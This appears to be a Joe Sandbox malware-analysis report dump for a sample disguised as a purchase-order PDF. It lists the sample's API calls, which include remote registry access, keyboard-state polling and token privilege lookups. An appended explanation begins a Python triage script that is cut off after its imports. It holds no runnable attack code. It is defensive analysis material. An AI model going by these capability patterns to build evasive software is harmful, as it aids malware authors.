                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                                                                                                                                                            • API String ID: 3590180749-2354261254
                                                                                                                                                                                                                                                                                                            • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                                                                                                                                                                                                            • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                              • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00458194
                                                                                                                                                                                                                                                                                                            • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                                                                                                                                                                                                            • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                                                                                                                                                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                                                                                                                                                            • API String ID: 2255324689-22481851
                                                                                                                                                                                                                                                                                                            • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                                                                                                                                                            • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
APIs
• RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
• RegCloseKey.ADVAPI32(?), ref: 00458615
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
• __wcsicoll.LIBCMT ref: 004585D6
• IIDFromString.OLE32(?,?,?,?), ref: 004585EB
• RegCloseKey.ADVAPI32(?), ref: 004585F8
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
• String ID: ($interface$interface\
• API String ID: 2231185022-3327702407
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 2691793716-3771769585
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
• __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
  • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
  • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
• GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
• GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
• __lock.LIBCMT ref: 00416B8A
• InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
• __lock.LIBCMT ref: 00416BAB
• ___addlocaleref.LIBCMT ref: 00416BC9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
• String ID: DecodePointer$EncodePointer$KERNEL32.DLL
• API String ID: 1028249917-2843748187
APIs
• SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
• SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
• CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
• SendMessageW.USER32(?,00000402,?), ref: 0044941C
• SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: MessageSend$CharNext
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 1350042424-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                                                                                                                                                                                            • Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
                                                                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 00453C5A
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 00453C82
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 00453C99
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 00453CDA
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 00453D07
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 00453D15
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 00453D3F
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 00453D4D
                                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 00453D77
                                                                                                                                                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 00453D85
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                                                                                                                                                                                            • Instruction ID: 09d2c23b2f41f951af40c960ff4fa7a39ed3d74d48f5bb091813d5d41b5bf946
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 439544d7db57c6269f5a832870b7215b314e2d5ec2fc8731d7b6f8ebe45629c5
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD5108311497C42AF731EF6048217A7BBE45F52782F488D5EE9C107283E619AB0C976B
                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                            • API String ID: 136442275-0
                                                                                                                                                                                                                                                                                                            • Opcode ID: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                                                                                                                                                                                                            • Instruction ID: e47e2093bf76b35e8f1fec89578fc46911e8a4506192668d3a16ce6d5165f020
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8bb1124220d8f68122d0f1a8633f784f40ed2a0c71bdd1f95919e960fb23027d
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 744124B2408345ABC235E754C885EEF73ECABD8314F44891EB68D42141EB796688C7A7
                                                                                                                                                                                                                                                                                                            APIs
  • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B479
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ConnectRegistry_wcslen
• String ID: HH
• API String ID: 535477410-2761332787
• Opcode ID: dd81b6afca0b69ee093bc818c763857178bde5d9027ed819eaece9cecf668df8
• Instruction ID: 7a368be733395892e28f24b11b3b05e85d853a2cd395d98498a1c99032eed9d9
• Opcode Fuzzy Hash: dd81b6afca0b69ee093bc818c763857178bde5d9027ed819eaece9cecf668df8
• Instruction Fuzzy Hash: 63E171B1604200ABC714EF28C981F1BB7E4EF88704F148A1EF685DB381D779E945CB9A
APIs
• GetClassNameW.USER32(?,?,00000400), ref: 004604B5
• GetWindowTextW.USER32(?,?,00000400), ref: 004604F1
• _wcslen.LIBCMT ref: 00460502
• CharUpperBuffW.USER32(?,00000000), ref: 00460510
• GetClassNameW.USER32(?,?,00000400), ref: 00460589
• GetWindowTextW.USER32(?,?,00000400), ref: 004605C2
• GetClassNameW.USER32(?,?,00000400), ref: 00460606
• GetClassNameW.USER32(?,?,00000400), ref: 0046063E
• GetWindowRect.USER32(?,?), ref: 004606AD
Strings
Similarity
• API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen
• String ID: ThumbnailClass
• API String ID: 4123061591-1241985126
• Opcode ID: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
• Instruction ID: b645ef8d54a60b7d8a856e9fdf4d8999e4c56e3b903fe9b51be5921097eabf2a
• Opcode Fuzzy Hash: d81b9eb1014bf0c552f647121340d293adfb5e43e55e37c5a686eb3c785bede7
• Instruction Fuzzy Hash: 3F91B0715043019FDB14DF24C884BAB77A8EF84715F04896FFD85AA281E778E905CBAB
APIs
  • Part of subcall function 00456354: GetCursorPos.USER32(004A83D8), ref: 0045636A
  • Part of subcall function 00456354: ScreenToClient.USER32(004A83D8,?), ref: 0045638A
  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563D0
  • Part of subcall function 00456354: GetAsyncKeyState.USER32(?), ref: 004563DC
• DefDlgProcW.USER32(?,00000205,?,?,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F55F
• ImageList_DragLeave.COMCTL32(00000000,004A83D8,00000000,00000001,004A83D8,?), ref: 0046F57D
• ImageList_EndDrag.COMCTL32 ref: 0046F583
• ReleaseCapture.USER32 ref: 0046F589
• SetWindowTextW.USER32(?,00000000), ref: 0046F620
• SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0046F630
Strings
Similarity
• API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
• String ID: @GUI_DRAGFILE$@GUI_DROPID$HH
• API String ID: 2483343779-2060113733
• Opcode ID: f23a46a28047cab398fe0a6e1917226b7ab7c03c2e7fe431430c5ad35c8bbb28
• Instruction ID: 4b94e37398fb4c0e8bf176de98e3888209b69965db7f8e5b86c8cb252d1f017b
• Opcode Fuzzy Hash: f23a46a28047cab398fe0a6e1917226b7ab7c03c2e7fe431430c5ad35c8bbb28
• Instruction Fuzzy Hash: EB5106716043119BD700DF18DC85FAF77A5EB89310F04492EF941973A2DB789D49CBAA
APIs
• ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 0046FD8A
• ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,004A83D8,?), ref: 0046FDF0
• SendMessageW.USER32(?,00001109,00000000,00000000), ref: 0046FE0E
• ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,004A83D8,?), ref: 0046FE20
• SendMessageW.USER32(?,0000113E,00000000,?), ref: 0046FEA5
• SendMessageW.USER32(?,0000113F,00000000,?), ref: 0046FEDF
• GetClientRect.USER32(?,?), ref: 0046FEF2
• RedrawWindow.USER32(?,?,00000000,00000000), ref: 0046FF02
• DestroyIcon.USER32(?), ref: 0046FFCC
Strings
Memory Dump Source
                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075570584.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075700685.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075719385.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2075752386.0000000000501000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                            • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                                                                                                                                                                                                                            • String ID: 2
                                                                                                                                                                                                                                                                                                            • API String ID: 1331449709-450215437
                                                                                                                                                                                                                                                                                                            • Opcode ID: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                                                                                                                                                                                                            • Instruction ID: e79942d1a0196d9b5e30c5c178d8ccafd59c9ae1e7fac48b8759c586c5a3b44e
                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0839cb131ab93339cce718f32a9fb856b385d6e902e652cc812f2dbbb554e4d7
                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EB51AC702043019FD320CF44D885BAABBE5FB88700F04487EE684872A2D7B5A849CB5A
APIs
• GetCurrentProcess.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00439409
• OpenThreadToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 0043940C
• GetCurrentProcess.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?), ref: 0043941D
• OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?), ref: 00439420
• LookupPrivilegeValueW.ADVAPI32(00000000,SeAssignPrimaryTokenPrivilege,?), ref: 0043945B
• LookupPrivilegeValueW.ADVAPI32(00000000,SeIncreaseQuotaPrivilege,?), ref: 00439474
• _memcmp.LIBCMT ref: 004394A9
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004394F8
Strings
• SeIncreaseQuotaPrivilege, xrefs: 0043946A
• SeAssignPrimaryTokenPrivilege, xrefs: 00439455
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: Process$CurrentLookupOpenPrivilegeTokenValue$CloseHandleThread_memcmp
• String ID: SeAssignPrimaryTokenPrivilege$SeIncreaseQuotaPrivilege
• API String ID: 1446985595-805462909
• Opcode ID: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
• Instruction ID: 628aaead06b6f58e004e5b45c2ed9710a22b4d2b921ab75b424857e8fd72c9d6
• Opcode Fuzzy Hash: 7b5964ebc210eec24af21402e2b7f40e95def761f5b1447ed6d44f65f7ea18b7
• Instruction Fuzzy Hash: DB31A371508312ABC710DF21CD41AAFB7E8FB99704F04591EF98193240E7B8DD4ACBAA
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0045D848
• GetDriveTypeW.KERNEL32(?,?), ref: 0045D8A3
• SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D94A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2075597847.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.jbxd
Similarity
• API ID: ErrorMode$DriveType
• String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$HH
• API String ID: 2907320926-41864084
• Opcode ID: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
• Instruction ID: d4cab332979e247f8c2da9788294718902473fa09eb5ff996f03d25688ce9cbb
• Opcode Fuzzy Hash: f2537af69be7bdfb8cd077d5fba63d09357e4425d7c4eca9e5473fe3d57dd33a
• Instruction Fuzzy Hash: C7318B75A083008FC310EF65E48481EB7A1AFC8315F648D2FF945A7362C779D9068BAB
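The two functions above are the kind of capability evidence an analyst pulls out of these per-function listings: the first opens the thread or process token and looks up SeAssignPrimaryTokenPrivilege and SeIncreaseQuotaPrivilege, which are the two privileges CreateProcessAsUser requires of the caller's token; the second wraps GetDriveTypeW in SetErrorMode(SEM_FAILCRITICALERRORS), so probing an empty removable drive does not pop the "insert a disk" dialog. The following Python is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses lines in the report's API listing format and flags those two patterns. The sample input is constructed from the listings above; the rule names, the `triage` helper and the argument heuristic (8-digit hex literal, named value, or `?` for unknown) are this example's own assumptions. SEM_FAILCRITICALERRORS = 0x0001 is the documented Windows value.

```python
"""Parse Joe Sandbox per-function 'APIs' listings and flag capability patterns."""
import re
from dataclasses import dataclass

# Constructed sample in the report's listing format (copied from the functions above).
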